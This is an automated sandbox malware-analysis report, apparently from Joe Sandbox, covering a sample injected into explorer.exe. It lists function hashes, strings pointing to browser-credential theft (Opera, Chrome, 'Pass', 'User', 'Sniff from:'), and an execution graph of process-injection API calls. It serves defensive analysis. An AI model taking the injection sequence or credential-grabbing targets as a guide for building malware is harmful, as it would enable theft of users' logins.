                                                                                • Instruction Fuzzy Hash: 6C41B070A18B088FDB14DF88A4856AD7BF2FB68701F40025EE409D3345DBB5AD85CBD6
                                                                                Function 081EDAB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                • API String ID: 0-355182820
                                                                                • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                • Instruction ID: 921ef0e917f7b51566355e9846061ac3de5f8da7543d4650970840729b47415d
                                                                                • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                • Instruction Fuzzy Hash: E5C16B74218F098FC758EF68D489AAAF3E1FF98305F40472EA59AC7250DF30A555CB86
                                                                                Function 081EDF12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                                • API String ID: 0-97273177
                                                                                • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                • Instruction ID: eb5ee2c46707fa4784b811787d227828a5f719a9fbc784aeafc2b1396acbaf9c
                                                                                • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                • Instruction Fuzzy Hash: AC51E431618B488FD719DF18D8812AAB7E5FF84701F501A2EF8CBC7242DBB49546CB82
                                                                                Function 081E72F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                • API String ID: 0-639201278
                                                                                • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                • Instruction ID: 2e84176ec26631c4bf157043d968c7a57c36fdbf8acd55867d650d5c0cf5fcf5
                                                                                • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                • Instruction Fuzzy Hash: B6C1AC74618E198FC758EF689495AAAB3E1FF98302F44436DA41EC7351DF30AA42CB85
                                                                                Function 081E72F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                • API String ID: 0-639201278
                                                                                • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                • Instruction ID: e2ae2c04340247bf6d5cf2b51d468afe2df9810af0b404edb23a1373ba042d0b
                                                                                • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                • Instruction Fuzzy Hash: 3EC1AC74618E198FC758EF68D495AAAB3E1FF98302F44436DA41EC7351DF30AA42CB85
                                                                                Function 081E8CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: UR$2$L: $Pass$User$name$word
                                                                                • API String ID: 0-2058692283
                                                                                • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                • Instruction ID: 459a1bc1956a0cb58dc975b4e1c7e18eee76607368720ef6ff41577f876135d7
                                                                                • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                • Instruction Fuzzy Hash: 54A19170618B488FDB19EFA8D444BEEB7E1FF98301F40462DE48AD7252EF7095458789
                                                                                Function 081E8CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: UR$2$L: $Pass$User$name$word
                                                                                • API String ID: 0-2058692283
                                                                                • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                • Instruction ID: 1a69d7e91b7bb970a26eafa4c1674ba327b282ece7f0ffa3fc4aadf7dad17c99
                                                                                • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                • Instruction Fuzzy Hash: 75918070618B488FDB19EFA8D444BEEB7E1FF98301F40462DE48AD7252EF7095458789
                                                                                Function 081E8352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $.$e$n$v
                                                                                • API String ID: 0-1849617553
                                                                                • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                • Instruction ID: 970a2cb4bd24d1090958ff03d8a8b437e2af9a5e5488f2978048ecdc0a8f016f
                                                                                • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                • Instruction Fuzzy Hash: 3C715F35618B498FD758EFA8C4847AAB7F1FF58305F00063EE44AC7262EF7199468B85
                                                                                Function 081E3C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                • API String ID: 0-1970020201
                                                                                • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                • Instruction ID: e473fa5918b8a9f57aaf86accfb87f9393c10d751bf22cd726ffadf4ad7a95fd
                                                                                • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                • Instruction Fuzzy Hash: C6514FB0918B4C8FDB54EFA4C045AEEB7F1FF58301F40462EA89AE7254EF7095418B89
                                                                                Function 081E486F Relevance: 6.4, Strings: 5, Instructions: 157COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4$\$dll$ion.$vers
                                                                                • API String ID: 0-1610437797
                                                                                • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                • Instruction ID: e2aca9ed82b8f63729793cb151a78234535be589fbbb9ee41545d06a0f96efa5
                                                                                • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                • Instruction Fuzzy Hash: 31414C74618F888BCBB5EF6498457EA77E5FF98302F41462EA88EC7340EF3095458786
                                                                                Function 081E64B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 32.d$cli.$dll$sspi$user
                                                                                • API String ID: 0-327345718
                                                                                • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                • Instruction ID: 7c56af85aed56fc2488e268962a54e01860a654993c9cb1d39bc84a788a216ea
                                                                                • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                • Instruction Fuzzy Hash: 95414B30A18E0D8FCB58EF6884946AE73E1FF78342F80416EA80AD7244DB71D581CB86
                                                                                Function 081E4432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .dll$el32$h$kern
                                                                                • API String ID: 0-4264704552
                                                                                • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                • Instruction ID: ac632229c2981aa6bddaca08ef2c823d7f81197d384ada9c8ce357dc6ea5df75
                                                                                • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                • Instruction Fuzzy Hash: 60418E70A08F4D8FD7A9DF2980843AAB7E1FF98302F104A2EA49EC3255DB70C545CB85
                                                                                Function 081EB0B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $Snif$f fr$om:
                                                                                • API String ID: 0-3434893486
                                                                                • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                • Instruction ID: ebf9a9458d0f2906601f38844ec590d37dfb1f98cae12128632a138068e98c92
                                                                                • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                • Instruction Fuzzy Hash: 3B31CD7550CF886FD71AEB28C4846DABBD4FF94300F50492EE49A87252EF30A54ACA42
                                                                                Function 081EB0C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $Snif$f fr$om:
                                                                                • API String ID: 0-3434893486
                                                                                • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                • Instruction ID: 2e7910ac7ec35fd1fdd688617345999e907e070a66015783db30ce9008a50a41
                                                                                • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                • Instruction Fuzzy Hash: 0131AD75508F486FD71AEB28C4846EAB7D4FF94301F50492EE49BD7352EF30A54ACA42
                                                                                Function 081E6FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .dll$chro$hild$me_c
                                                                                • API String ID: 0-3136806129
                                                                                • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                • Instruction ID: 222fb973455ec30e8097123f43634c6d9a6d743fdf5ac5ee9eacbba5331ac8f3
                                                                                • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                • Instruction Fuzzy Hash: 2D313A74118E088FCB94EF688495BAAB7E1FF98202F84466DA44ECB355DF30C9458792
                                                                                Function 081E6FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .dll$chro$hild$me_c
                                                                                • API String ID: 0-3136806129
                                                                                • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                • Instruction ID: 95cbb107130d6eced79014026b86918b02700b5c4152e457746562bb0ffe6992
                                                                                • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                • Instruction Fuzzy Hash: DB313974218F088FCB94EF688494BAAB7E1FF98201F94566DA44ACB355DF30C9458B92
                                                                                Function 081E98C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                • API String ID: 0-319646191
                                                                                • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                • Instruction ID: 45353b62a74573f74b77717a7fc981075dd10d1ef83d52a6a4d535ca0452e886
                                                                                • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                • Instruction Fuzzy Hash: 4231A071614A0D8BCB44EFA8C8847EEBBE1FF58216F40422AE45ED7341DF7886458799
                                                                                Function 081E98BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                • API String ID: 0-319646191
                                                                                • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                • Instruction ID: ce27ebd84a1430b34d0754868ed8c35f5be129a390c9728effe374ae13cfabac
                                                                                • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                • Instruction Fuzzy Hash: A721D270610A0D8BCF04EFA8C8847EDBBE0FF58206F40422AE45AD7341DF748605C799
                                                                                Function 081EAE94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .$l$l$t
                                                                                • API String ID: 0-168566397
                                                                                • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                • Instruction ID: edcd8a3cc72f7f2f6a47061ef7043785fc1f780ba6b4cd39cc4784e7419afe41
                                                                                • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                • Instruction Fuzzy Hash: 3E215778A24E0D9BDB48EFA8C044BADBAE1FF58305F50462ED109D3701DB7495918B84
                                                                                Function 081EAE92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .$l$l$t
                                                                                • API String ID: 0-168566397
                                                                                • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                • Instruction ID: 69d514958ef596039e6e5e5bd06a5819a65872b7f33590445ea8ab9f4a0c9507
                                                                                • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                • Instruction Fuzzy Hash: DA217A78A24E0E9BDB48EFA8C044BAEBAF1FF58305F50462ED109D3701DB7495918B84
                                                                                Function 081EAFF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: auth$logi$pass$user
                                                                                • API String ID: 0-2393853802
                                                                                • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                • Instruction ID: 3a992f9f8e5bf5cc384d0b7371c8619dd5271ac8ef3fed546ca04d9352a4898e
                                                                                • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                • Instruction Fuzzy Hash: 0F21CD30618B0D8BCB05DF9998906EEB7F1EF88354F004629E40AEB346D7B0E9158BD2

                                                                                Execution Graph

                                                                                Execution Coverage:2.4%
                                                                                Dynamic/Decrypted Code Coverage:6.5%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:617
                                                                                Total number of Limit Nodes:77
                                                                                execution_graph 79147 a4cb84 79150 a4a042 79147->79150 79149 a4cba5 79151 a4a06b 79150->79151 79152 a4a182 NtQueryInformationProcess 79151->79152 79167 a4a56c 79151->79167 79154 a4a1ba 79152->79154 79153 a4a1ef 79153->79149 79154->79153 79155 a4a290 79154->79155 79156 a4a2db 79154->79156 79179 a49de2 NtCreateSection NtMapViewOfSection NtClose 79155->79179 79157 a4a2fc RtlWow64SuspendThread 79156->79157 79159 a4a30d 79157->79159 79161 a4a331 79157->79161 79159->79149 79160 a4a2cf 79160->79149 79163 a4a412 79161->79163 79170 a49bb2 79161->79170 79164 a4a531 79163->79164 79166 a4a4a6 NtSetContextThread 79163->79166 79165 a4a552 NtResumeThread 79164->79165 79165->79167 79169 a4a4bd 79166->79169 79167->79149 79168 a4a51c NtQueueApcThread 79168->79164 79169->79164 79169->79168 79171 a49bf7 79170->79171 79172 a49c66 NtCreateSection 79171->79172 79173 a49ca0 79172->79173 79174 a49d4e 79172->79174 79175 a49cc1 NtMapViewOfSection 79173->79175 79174->79163 79175->79174 79176 a49d0c 79175->79176 79176->79174 79177 a49d88 79176->79177 79178 a49dc5 NtClose 79177->79178 79178->79163 79179->79160 79181 203f900 LdrInitializeThunk 79184 99060 79187 9909b 79184->79187 79195 9bd20 79184->79195 79186 9917c 79187->79186 79198 8acf0 79187->79198 79191 99100 Sleep 79192 990ed 79191->79192 79192->79186 79192->79191 79207 98c80 LdrLoadDll 79192->79207 79208 98e90 LdrLoadDll 79192->79208 79209 9a520 79195->79209 79197 9bd4d 79197->79187 79199 8ad14 79198->79199 79200 8ad50 LdrLoadDll 79199->79200 79201 8ad1b 79199->79201 79200->79201 79202 94e50 79201->79202 79203 94e6a 79202->79203 79205 94e5e 79202->79205 79203->79192 79205->79203 79216 952d0 LdrLoadDll 79205->79216 79206 94fbc 79206->79192 79207->79192 79208->79192 79212 9af40 79209->79212 79211 9a53c NtAllocateVirtualMemory 79211->79197 79213 9af50 79212->79213 79214 9af72 79212->79214 79215 94e50 LdrLoadDll 79213->79215 79214->79211 79215->79214 79216->79206 79217 9b9b0 79218 9b9d6 79217->79218 79225 89d40 79218->79225 79220 9b9e2 79221 9ba06 79220->79221 79233 88f30 79220->79233 79271 9a690 LdrLoadDll 79221->79271 79224 9ba17 79226 89d4d 79225->79226 79272 89c90 79225->79272 79228 89d54 79226->79228 79284 89c30 79226->79284 79228->79220 79234 88f57 79233->79234 79680 8b1c0 79234->79680 79236 88f69 79684 8af10 79236->79684 79238 88f86 79244 88f8d 79238->79244 79755 8ae40 LdrLoadDll 79238->79755 79241 88ffc 79700 8f410 79241->79700 79243 89006 79245 9bf70 2 API calls 79243->79245 79267 890f2 79243->79267 79244->79267 79688 8f380 79244->79688 79246 8902a 79245->79246 79247 9bf70 2 API calls 79246->79247 79248 8903b 79247->79248 79249 9bf70 2 API calls 79248->79249 79250 8904c 79249->79250 79712 8ca90 79250->79712 79252 89059 79253 94a50 8 API calls 79252->79253 79254 89066 79253->79254 79255 94a50 8 API calls 79254->79255 79256 89077 79255->79256 79257 89084 79256->79257 79258 890a5 79256->79258 79722 8d620 79257->79722 79260 94a50 8 API calls 79258->79260 79266 890c1 79260->79266 79262 890e9 79264 88d00 23 API calls 79262->79264 79264->79267 79265 89092 79738 88d00 79265->79738 79266->79262 79756 8d6c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 79266->79756 79267->79221 79271->79224 79303 98ba0 79272->79303 79276 89cb6 79276->79226 79277 89cac 79277->79276 79310 9b290 79277->79310 79279 89cf3 79279->79276 79321 89ab0 79279->79321 79281 89d13 79327 89620 LdrLoadDll 79281->79327 79283 89d25 79283->79226 79285 89c4a 79284->79285 79286 9b580 LdrLoadDll 79284->79286 79659 9b580 79285->79659 79286->79285 79289 9b580 LdrLoadDll 79290 89c71 79289->79290 79291 8f180 79290->79291 79292 8f199 79291->79292 79663 8b040 79292->79663 79294 8f1ac 79667 9a1c0 79294->79667 79297 89d65 79297->79220 79299 8f1d2 79300 8f1fd 79299->79300 79673 9a240 79299->79673 79301 9a470 2 API calls 79300->79301 79301->79297 79304 98baf 79303->79304 79305 94e50 LdrLoadDll 79304->79305 79306 89ca3 79305->79306 79307 98a50 79306->79307 79328 9a5e0 79307->79328 79311 9b2a9 79310->79311 79331 94a50 79311->79331 79313 9b2ca 79313->79279 79314 9b2c1 79314->79313 79370 9b0d0 79314->79370 79316 9b2de 79316->79313 79388 99ee0 79316->79388 79324 89aca 79321->79324 79637 87ea0 79321->79637 79323 89ad1 79323->79281 79324->79323 79650 88160 79324->79650 79327->79283 79329 9af40 LdrLoadDll 79328->79329 79330 98a65 79328->79330 79329->79330 79330->79277 79332 94d85 79331->79332 79342 94a64 79331->79342 79332->79314 79335 94b90 79399 9a340 79335->79399 79336 94b73 79456 9a440 LdrLoadDll 79336->79456 79339 94b7d 79339->79314 79340 94bb7 79341 9bda0 2 API calls 79340->79341 79344 94bc3 79341->79344 79342->79332 79396 99c30 79342->79396 79343 94d49 79346 9a470 2 API calls 79343->79346 79344->79339 79344->79343 79345 94d5f 79344->79345 79350 94c52 79344->79350 79465 94790 LdrLoadDll NtReadFile NtClose 79345->79465 79347 94d50 79346->79347 79347->79314 79349 94d72 79349->79314 79351 94cb9 79350->79351 79353 94c61 79350->79353 79351->79343 79352 94ccc 79351->79352 79458 9a2c0 79352->79458 79354 94c7a 79353->79354 79355 94c66 79353->79355 79358 94c7f 79354->79358 79359 94c97 79354->79359 79457 94650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 79355->79457 79402 946f0 79358->79402 79359->79347 79414 94410 79359->79414 79362 94c70 79362->79314 79364 94d2c 79462 9a470 79364->79462 79365 94c8d 79365->79314 79368 94caf 79368->79314 79369 94d38 79369->79314 79371 9b0e1 79370->79371 79372 9b0f3 79371->79372 79373 9bd20 2 API calls 79371->79373 79372->79316 79374 9b114 79373->79374 79484 94070 79374->79484 79376 9b160 79376->79316 79377 9b137 79377->79376 79378 94070 3 API calls 79377->79378 79380 9b159 79378->79380 79380->79376 79516 95390 79380->79516 79381 9b1ea 79383 9b1fa 79381->79383 79610 9aee0 LdrLoadDll 79381->79610 79526 9ad50 79383->79526 79385 9b228 79605 99ea0 79385->79605 79389 9af40 LdrLoadDll 79388->79389 79390 99efc 79389->79390 79633 203fae8 LdrInitializeThunk 79390->79633 79391 99f17 79393 9bda0 79391->79393 79634 9a650 79393->79634 79395 9b339 79395->79279 79397 9af40 LdrLoadDll 79396->79397 79398 94b44 79397->79398 79398->79335 79398->79336 79398->79339 79400 9af40 LdrLoadDll 79399->79400 79401 9a35c NtCreateFile 79400->79401 79401->79340 79403 9470c 79402->79403 79404 9a2c0 LdrLoadDll 79403->79404 79405 9472d 79404->79405 79406 94748 79405->79406 79407 94734 79405->79407 79409 9a470 2 API calls 79406->79409 79408 9a470 2 API calls 79407->79408 79410 9473d 79408->79410 79411 94751 79409->79411 79410->79365 79466 9bfb0 LdrLoadDll RtlAllocateHeap 79411->79466 79413 9475c 79413->79365 79415 9445b 79414->79415 79416 9448e 79414->79416 79418 9a2c0 LdrLoadDll 79415->79418 79417 945d9 79416->79417 79421 944aa 79416->79421 79420 9a2c0 LdrLoadDll 79417->79420 79419 94476 79418->79419 79422 9a470 2 API calls 79419->79422 79426 945f4 79420->79426 79423 9a2c0 LdrLoadDll 79421->79423 79424 9447f 79422->79424 79425 944c5 79423->79425 79424->79368 79428 944cc 79425->79428 79429 944e1 79425->79429 79480 9a300 LdrLoadDll 79426->79480 79431 9a470 2 API calls 79428->79431 79432 944fc 79429->79432 79433 944e6 79429->79433 79430 9462e 79434 9a470 2 API calls 79430->79434 79435 944d5 79431->79435 79442 94501 79432->79442 79467 9bf70 79432->79467 79436 9a470 2 API calls 79433->79436 79437 94639 79434->79437 79435->79368 79438 944ef 79436->79438 79437->79368 79438->79368 79439 94513 79439->79368 79442->79439 79471 9a3f0 79442->79471 79443 9457e 79446 9459a 79443->79446 79447 94585 79443->79447 79444 94567 79444->79443 79479 9a280 LdrLoadDll 79444->79479 79448 9a470 2 API calls 79446->79448 79449 9a470 2 API calls 79447->79449 79450 945a3 79448->79450 79449->79439 79451 945cf 79450->79451 79474 9bb70 79450->79474 79451->79368 79453 945ba 79454 9bda0 2 API calls 79453->79454 79455 945c3 79454->79455 79455->79368 79456->79339 79457->79362 79459 9af40 LdrLoadDll 79458->79459 79460 94d14 79459->79460 79461 9a300 LdrLoadDll 79460->79461 79461->79364 79463 9af40 LdrLoadDll 79462->79463 79464 9a48c NtClose 79463->79464 79464->79369 79465->79349 79466->79413 79468 9bf73 79467->79468 79481 9a610 79468->79481 79470 9bf88 79470->79442 79472 9a40c NtReadFile 79471->79472 79473 9af40 LdrLoadDll 79471->79473 79472->79444 